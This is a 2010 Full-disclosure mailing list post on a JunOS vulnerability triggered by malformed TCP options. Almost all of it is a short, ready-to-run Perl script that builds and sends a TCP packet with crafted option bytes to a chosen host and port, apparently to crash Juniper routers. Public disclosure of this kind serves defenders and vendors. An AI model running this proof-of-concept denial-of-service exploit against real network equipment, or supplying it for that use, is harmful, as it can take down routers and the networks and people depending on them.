full-disclosure-uk January 2010 archive

[Full-disclosure] JunOS malformed TCP options vulnerability

From: Jeremy L. Gaddis <jeremy_at_nospam>
Date: Sun Jan 10 2010 - 02:31:47 GMT
To: full-disclosure@lists.grok.org.uk


This works for me:

$ cat junos-crash.pl

#!/usr/bin/perl

my $host = shift;
my $port = shift;

use Net::Packet qw($Env);
use Net::Packet::IPv4;
my $ip = Net::Packet::IPv4->new(dst => $host);

use Net::Packet::TCP;
my $tcp = Net::Packet::TCP->new(
    dst     => $port,
    options => "\x65\x02\x01\x01",
);

use Net::Packet::Frame;
my $frame = Net::Packet::Frame->new(l3 => $ip, l4 => $tcp);

$frame->send;

exit 0;

--
Jeremy L. Gaddis
http://evilrouters.net/